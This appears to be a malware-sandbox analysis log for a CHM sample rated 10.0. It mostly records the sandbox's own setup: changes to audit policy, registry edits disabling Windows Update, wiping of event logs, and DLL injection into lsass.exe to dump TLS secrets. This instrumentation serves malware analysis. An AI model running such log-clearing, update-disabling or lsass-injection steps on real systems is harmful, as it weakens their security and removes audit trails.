Analysis

Category Package Started Completed Duration Options Log(s) MalScore
FILE chm 2025-12-09 15:09:38 2025-12-09 15:13:05 207 seconds Show Options Show Analysis Log 10.0 
vnc_port=5902
2025-12-06 09:51:40,437 [root] INFO: Date set to: 20251209T07:09:37, timeout set to: 180
2025-12-09 07:09:37,015 [root] DEBUG: Starting analyzer from: C:\tmpm1ij88hx
2025-12-09 07:09:37,015 [root] DEBUG: Storing results at: C:\STyimYXp
2025-12-09 07:09:37,015 [root] DEBUG: Pipe server name: \\.\PIPE\xMlfvmSYte
2025-12-09 07:09:37,015 [root] DEBUG: Python path: C:\Python38
2025-12-09 07:09:37,015 [root] INFO: analysis running as an admin
2025-12-09 07:09:37,015 [root] INFO: analysis package specified: "chm"
2025-12-09 07:09:37,015 [root] DEBUG: importing analysis package module: "modules.packages.chm"...
2025-12-09 07:09:37,015 [root] DEBUG: imported analysis package "chm"
2025-12-09 07:09:37,015 [root] DEBUG: initializing analysis package "chm"...
2025-12-09 07:09:37,015 [lib.common.common] INFO: wrapping
2025-12-09 07:09:37,015 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-09 07:09:37,015 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\5f11baf452c0d7cbb25c.chm
2025-12-09 07:09:37,015 [root] INFO: Analyzer: Package modules.packages.chm does not specify a DLL option
2025-12-09 07:09:37,015 [root] INFO: Analyzer: Package modules.packages.chm does not specify a DLL_64 option
2025-12-09 07:09:37,015 [root] INFO: Analyzer: Package modules.packages.chm does not specify a loader option
2025-12-09 07:09:37,015 [root] INFO: Analyzer: Package modules.packages.chm does not specify a loader_64 option
2025-12-09 07:09:37,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-09 07:09:37,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-09 07:09:37,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-09 07:09:37,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-09 07:09:37,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-09 07:09:37,078 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-09 07:09:37,078 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-09 07:09:37,078 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-09 07:09:37,078 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-09 07:09:37,171 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2025-12-09 07:09:37,171 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-09 07:09:37,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-09 07:09:37,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-09 07:09:37,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-09 07:09:37,187 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-09 07:09:37,187 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-09 07:09:37,187 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-09 07:09:37,187 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-09 07:09:37,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-09 07:09:37,187 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-09 07:09:37,187 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-09 07:09:37,187 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-09 07:09:37,187 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-09 07:09:37,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-09 07:09:37,187 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-09 07:09:37,187 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-09 07:09:37,187 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-09 07:09:37,187 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-09 07:09:37,187 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-09 07:09:37,203 [modules.auxiliary.disguise] INFO: Disguising GUID to cb7fa585-a71f-4130-9183-e91060cd553f
2025-12-09 07:09:37,203 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2025-12-09 07:09:37,203 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-09 07:09:37,203 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-09 07:09:37,203 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-09 07:09:37,203 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-09 07:09:37,203 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-09 07:09:37,203 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-09 07:09:37,203 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-09 07:09:37,203 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-09 07:09:37,203 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-09 07:09:37,203 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-09 07:09:37,203 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-09 07:09:37,203 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-09 07:09:37,203 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-09 07:09:37,203 [root] DEBUG: attempting to configure 'Human' from data
2025-12-09 07:09:37,203 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-09 07:09:37,203 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-09 07:09:37,203 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-09 07:09:37,203 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-09 07:09:37,203 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-09 07:09:37,203 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-09 07:09:37,203 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-09 07:09:37,203 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-09 07:09:37,203 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-09 07:09:37,203 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-09 07:09:37,203 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-09 07:09:37,203 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-09 07:09:37,218 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-09 07:09:37,218 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-09 07:09:37,218 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-09 07:09:37,218 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-09 07:09:37,218 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-09 07:09:37,281 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-09 07:09:37,328 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-09 07:09:37,328 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-09 07:09:37,328 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-09 07:09:37,328 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-09 07:09:37,328 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-09 07:09:37,328 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-09 07:09:37,328 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 448
2025-12-09 07:09:37,328 [lib.api.process] INFO: Monitor config for <Process 448 lsass.exe>: C:\tmpm1ij88hx\dll\448.ini
2025-12-09 07:09:37,343 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor
2025-12-09 07:09:37,343 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmpm1ij88hx\dll\tLhPYBFm.dll, loader C:\tmpm1ij88hx\bin\yaKgHGUf.exe
2025-12-09 07:09:37,359 [root] DEBUG: Loader: Injecting process 448 with C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:09:37,375 [root] DEBUG: 448: Python path set to 'C:\Python38'.
2025-12-09 07:09:37,375 [root] INFO: Disabling sleep skipping.
2025-12-09 07:09:37,375 [root] DEBUG: 448: TLS secret dump mode enabled.
2025-12-09 07:09:37,375 [root] DEBUG: 448: Monitor initialised: 64-bit capemon loaded in process 448 at 0x000007FEF30B0000, thread 2600, image base 0x00000000FF3B0000, stack from 0x00000000018C4000-0x00000000018D0000
2025-12-09 07:09:37,390 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-09 07:09:37,390 [root] DEBUG: 448: Commandline: C:\Windows\system32\lsass.exe
2025-12-09 07:09:37,390 [root] DEBUG: 448: Hooked 5 out of 5 functions
2025-12-09 07:09:37,390 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-09 07:09:37,390 [root] DEBUG: Successfully injected DLL C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:09:37,390 [lib.api.process] INFO: Injected into 64-bit <Process 448 lsass.exe>
2025-12-09 07:09:37,390 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-09 07:09:37,390 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-09 07:09:37,390 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-09 07:09:37,390 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-09 07:09:37,390 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-09 07:09:37,406 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-09 07:09:37,406 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-09 07:09:37,406 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-09 07:09:37,406 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-09 07:09:37,406 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-09 07:09:37,406 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-09 07:09:37,421 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-09 07:09:37,453 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-09 07:09:37,468 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-09 07:09:37,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-09 07:09:37,531 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-09 07:09:37,546 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-09 07:09:37,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-09 07:09:37,593 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-09 07:09:37,625 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-09 07:09:37,656 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-09 07:09:37,656 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-09 07:09:37,703 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-09 07:09:37,734 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-09 07:09:37,750 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-09 07:09:37,750 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-09 07:09:37,781 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-09 07:09:37,781 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-09 07:09:37,796 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-09 07:09:37,796 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-09 07:09:37,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-09 07:09:37,828 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-09 07:09:37,843 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-09 07:09:37,859 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-09 07:09:37,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-09 07:09:37,890 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-09 07:09:37,906 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-09 07:09:37,921 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-09 07:09:37,937 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-09 07:09:37,953 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-09 07:09:37,968 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-09 07:09:37,984 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-09 07:09:38,000 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-09 07:09:38,015 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-09 07:09:38,031 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-09 07:09:38,046 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-09 07:09:38,062 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-09 07:09:38,078 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-09 07:09:38,093 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-09 07:09:38,109 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-09 07:09:38,125 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-09 07:09:38,140 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-09 07:09:38,156 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-09 07:09:38,171 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-09 07:09:38,187 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-09 07:09:38,203 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-09 07:09:38,218 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-09 07:09:38,234 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-09 07:09:38,249 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-09 07:09:38,249 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-09 07:09:38,265 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-09 07:09:38,281 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-09 07:09:38,296 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-09 07:09:38,312 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-09 07:09:38,328 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-09 07:09:38,343 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-09 07:09:38,359 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-09 07:09:38,375 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-09 07:09:38,406 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-09 07:09:38,421 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-09 07:09:38,437 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-09 07:09:38,453 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-09 07:09:42,484 [root] INFO: Restarting WMI Service
2025-12-09 07:09:44,515 [root] DEBUG: package modules.packages.chm does not support configure, ignoring
2025-12-09 07:09:44,515 [root] WARNING: configuration error for package modules.packages.chm: error importing data.packages.chm: No module named 'data.packages'
2025-12-09 07:09:44,515 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-09 07:09:44,515 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\hh.exe" with arguments ""C:\Users\user\AppData\Local\Temp\5f11baf452c0d7cbb25c.chm"" with pid 2492
2025-12-09 07:09:44,515 [lib.api.process] INFO: Monitor config for <Process 2492 hh.exe>: C:\tmpm1ij88hx\dll\2492.ini
2025-12-09 07:09:44,515 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmpm1ij88hx\dll\tLhPYBFm.dll, loader C:\tmpm1ij88hx\bin\yaKgHGUf.exe
2025-12-09 07:09:44,515 [root] DEBUG: Loader: Injecting process 2492 (thread 2460) with C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:09:44,515 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-09 07:09:44,515 [root] DEBUG: Successfully injected DLL C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:09:44,515 [lib.api.process] INFO: Injected into 64-bit <Process 2492 hh.exe>
2025-12-09 07:09:46,515 [lib.api.process] INFO: Successfully resumed <Process 2492 hh.exe>
2025-12-09 07:09:46,515 [root] DEBUG: 2492: Python path set to 'C:\Python38'.
2025-12-09 07:09:46,515 [root] INFO: Disabling sleep skipping.
2025-12-09 07:09:46,515 [root] DEBUG: 2492: Dropped file limit defaulting to 100.
2025-12-09 07:09:46,515 [root] DEBUG: 2492: YaraInit: Compiled 41 rule files
2025-12-09 07:09:46,515 [root] DEBUG: 2492: YaraInit: Compiled rules saved to file C:\tmpm1ij88hx\data\yara\capemon.yac
2025-12-09 07:09:46,515 [root] DEBUG: 2492: YaraScan: Scanning 0x00000000FFBF0000, size 0x7012
2025-12-09 07:09:46,515 [root] DEBUG: 2492: Monitor initialised: 64-bit capemon loaded in process 2492 at 0x000007FEF30B0000, thread 2460, image base 0x00000000FFBF0000, stack from 0x0000000000265000-0x0000000000270000
2025-12-09 07:09:46,515 [root] DEBUG: 2492: Commandline: "C:\Windows\hh.exe" "C:\Users\user\AppData\Local\Temp\5f11baf452c0d7cbb25c.chm"
2025-12-09 07:09:46,515 [root] DEBUG: 2492: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-09 07:09:46,531 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-09 07:09:46,531 [root] DEBUG: 2492: set_hooks: Unable to hook LockResource
2025-12-09 07:09:46,531 [root] DEBUG: 2492: Hooked 605 out of 606 functions
2025-12-09 07:09:46,546 [root] INFO: Loaded monitor into process with pid 2492
2025-12-09 07:09:46,546 [root] DEBUG: 2492: caller_dispatch: Added region at 0x00000000FFBF0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00000000FFBF1FED, thread 2460).
2025-12-09 07:09:46,546 [root] DEBUG: 2492: YaraScan: Scanning 0x00000000FFBF0000, size 0x7012
2025-12-09 07:09:46,546 [root] DEBUG: 2492: ProcessImageBase: Main module image at 0x00000000FFBF0000 unmodified (entropy change 0.000000e+00)
2025-12-09 07:09:46,546 [root] DEBUG: 2492: DLL loaded at 0x000007FEF7120000: C:\Windows\System32\hhctrl.ocx (0xb1000 bytes).
2025-12-09 07:09:46,546 [root] DEBUG: 2492: DLL loaded at 0x000007FEFECB0000: C:\Windows\system32\SHELL32 (0xd8b000 bytes).
2025-12-09 07:09:46,546 [root] DEBUG: 2492: DLL loaded at 0x000007FEFA740000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\COMCTL32 (0xa0000 bytes).
2025-12-09 07:09:46,546 [root] DEBUG: 2492: DLL loaded at 0x000007FEFEB70000: C:\Windows\system32\OLEAUT32 (0xdb000 bytes).
2025-12-09 07:09:46,562 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD110000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2025-12-09 07:09:46,562 [root] DEBUG: 2492: DLL loaded at 0x000007FEFB9F0000: C:\Windows\system32\uxtheme (0x56000 bytes).
2025-12-09 07:09:46,562 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD2B0000: C:\Windows\system32\profapi (0xf000 bytes).
2025-12-09 07:09:46,562 [root] DEBUG: 2492: DLL loaded at 0x000007FEFB120000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2025-12-09 07:09:46,562 [root] DEBUG: 2492: DLL loaded at 0x000007FEFE460000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2025-12-09 07:09:46,562 [root] DEBUG: 2492: DLL loaded at 0x000007FEFE7F0000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2025-12-09 07:09:46,562 [root] DEBUG: 2492: DLL loaded at 0x000007FEFB260000: C:\Windows\System32\itss (0x2d000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFE660000: C:\Windows\system32\urlmon (0x18a000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD330000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD2E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD360000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD650000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFC390000: C:\Windows\system32\version (0xc000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD2D0000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-09 07:09:46,578 [root] DEBUG: 2492: DLL loaded at 0x0000000077900000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-09 07:09:46,593 [root] DEBUG: 2492: DLL loaded at 0x000007FEFE190000: C:\Windows\system32\iertutil (0x2cc000 bytes).
2025-12-09 07:09:46,609 [root] DEBUG: 2492: DLL loaded at 0x000007FEFDC70000: C:\Windows\system32\WININET (0x4ac000 bytes).
2025-12-09 07:09:46,609 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\USERENV (0x1f000 bytes).
2025-12-09 07:09:46,640 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Roaming\Microsoft\HTML Help\hh.dat
2025-12-09 07:09:46,640 [root] DEBUG: 2492: DLL loaded at 0x000007FEFB4D0000: C:\Windows\system32\dwmapi (0x18000 bytes).
2025-12-09 07:09:46,640 [root] DEBUG: 2492: DLL loaded at 0x000007FEFCA50000: C:\Windows\system32\CRYPTSP (0x18000 bytes).
2025-12-09 07:09:46,656 [root] DEBUG: 2492: DLL loaded at 0x000007FEFC750000: C:\Windows\system32\rsaenh (0x47000 bytes).
2025-12-09 07:09:46,656 [root] DEBUG: 2492: DLL loaded at 0x000007FEF1D20000: C:\Windows\System32\ieframe (0xec2000 bytes).
2025-12-09 07:09:46,656 [root] DEBUG: 2492: DLL loaded at 0x000007FEF3CE0000: C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2025-12-09 07:09:46,656 [root] DEBUG: 2492: DLL loaded at 0x000007FEF85C0000: C:\Windows\System32\WINHTTP (0x71000 bytes).
2025-12-09 07:09:46,656 [root] DEBUG: 2492: DLL loaded at 0x000007FEF8550000: C:\Windows\System32\webio (0x65000 bytes).
2025-12-09 07:09:46,671 [root] DEBUG: 2492: DLL loaded at 0x000007FEFBCD0000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_e372d88f30fbb845\comctl32 (0x1f5000 bytes).
2025-12-09 07:09:46,671 [root] DEBUG: 2492: DLL loaded at 0x000007FEF3460000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2025-12-09 07:09:46,671 [root] DEBUG: 2492: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-09 07:09:46,671 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD120000: C:\Windows\system32\SXS (0x91000 bytes).
2025-12-09 07:09:46,703 [root] DEBUG: 2492: DLL loaded at 0x000007FEFD0B0000: C:\Windows\system32\apphelp (0x57000 bytes).
2025-12-09 07:09:46,703 [root] DEBUG: 2492: DLL loaded at 0x000007FEFCEC0000: C:\Windows\system32\Secur32 (0xb000 bytes).
